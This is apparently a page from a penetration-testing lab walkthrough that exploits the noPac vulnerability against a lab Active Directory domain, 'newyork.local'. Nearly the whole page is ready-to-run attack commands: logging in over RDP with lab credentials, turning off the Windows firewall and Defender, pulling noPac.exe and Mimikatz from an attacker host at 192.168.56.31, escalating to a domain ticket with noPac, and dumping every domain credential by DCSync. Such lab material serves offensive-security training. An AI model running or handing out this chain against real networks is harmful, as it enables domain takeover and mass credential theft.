From Windows With noPAC.exe

RDP to NYC

xfreerdp /d:newyork.local /u:mateo.pacheco /p:'elsenorpacheco' /v:192.168.56.10 /size:80%  /cert-ignore

disable firewall and defender

#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"

#disable defender
Set-MpPreference -DisableRealtimeMonitoring $true

Download noPac.exe

wget https://github.com/TryA9ain/noPac/releases/download/v1.0/noPac.exe

Upload noPac.exe

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/noPac.exe', 'C:\Users\mateo.pacheco\desktop\noPac.exe')

Upload Mimikatz

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/mimikatz_trunk.zip', 'C:\Users\mateo.pacheco\desktop\mimikatz_trunk.zip')

Execute noPac.exe

this is going to get a TGT, export it as a .kirbi and import the .kibir as ticket.kirbi

.\noPac.exe /domain newyork.local /dc nyc.newyork.local /mAccount test1b$ /mPassword "TesT1b13!#@" /user donald.trump /pass MaKeam3ricaGr3at /service cifs /ptt

dcsync with mimikatz

.\mimikatz
lsadump::dcsync /domain:newyork.local /all

PreviousFrom Linux With NoPAC.py NextPrintNightmare - Bronx

Last updated 2 years ago

hashtagRDP to NYC

hashtagdisable firewall and defender

hashtagDownload noPac.exe

hashtagUpload noPac.exe

hashtagUpload Mimikatz

hashtagExecute noPac.exe

hashtagdcsync with mimikatz

RDP to NYC

disable firewall and defender

Download noPac.exe

Upload noPac.exe

Upload Mimikatz

Execute noPac.exe

dcsync with mimikatz